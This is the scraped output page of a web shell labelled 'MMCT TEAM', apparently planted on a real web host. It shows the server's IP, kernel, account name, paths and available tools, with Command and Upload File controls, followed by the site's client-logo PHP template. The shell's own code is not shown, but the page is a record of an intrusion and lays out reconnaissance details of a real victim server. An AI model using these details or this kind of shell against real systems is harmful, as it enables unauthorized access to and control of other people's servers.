MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.221.59.121
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/adisgauges.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/adisgauges.com/index-client.php
<div class="section-full pd-top  bg-gray pd-btm">
      <div class="section-full bg-img-fix content-inner">
        <div class="container">
            
               <div class="section-head text-center">
      <h2 class="text-uppercase">Our Clients</h2>
      <div class="dlab-separator-outer ">
        <div class="dlab-separator bg-secondry style-skew"></div>
      </div>
    </div>
    
          <div class="row">
            <ul id="masonry" class="dlab-gallery-listing gallery-grid-4 gallery mfp-gallery m-b0">
              <?php
$sql_logos=db_query("select * from tbl_client_logo where 1 order by client_logo_id asc");
if(mysqli_num_rows($sql_logos) >0){
while($LOGO_DATA=mysqli_fetch_array($sql_logos)){
@extract($LOGO_DATA);	  
?>
              <li class="card-container col-lg-3 col-md-3 col-sm-6 col-xs-12">
                <div class="dlab-box dlab-gallery-box">
                  <div class="dlab-media dlab-img-overlay1 dlab-img-effect zoom-slow"> <a href="javascript:void(0);">
                       <img src="<?=$site_url?>/client_logo/<?=$LOGO_DATA['client_logo_image_name']?>" alt="Client Logo" title="Client Logo" class="client-logo1" style="width:100% !important; height:200px !important;"> </a>
                    <div class="overlay-bx">
                      <div class="overlay-icon">
                           <a  href="<?=$site_url?>/client_logo/<?=$LOGO_DATA['client_logo_image_name']?>" class="mfp-link"  title="Client Logo"> <i class="fa fa-picture-o icon-bx-xs"></i> </a> </div>
                    </div>
                  </div>
                </div>
              </li>
              <? }} ?>
            </ul>
          </div>
        </div>
      </div>
    </div>

MMCT - 2023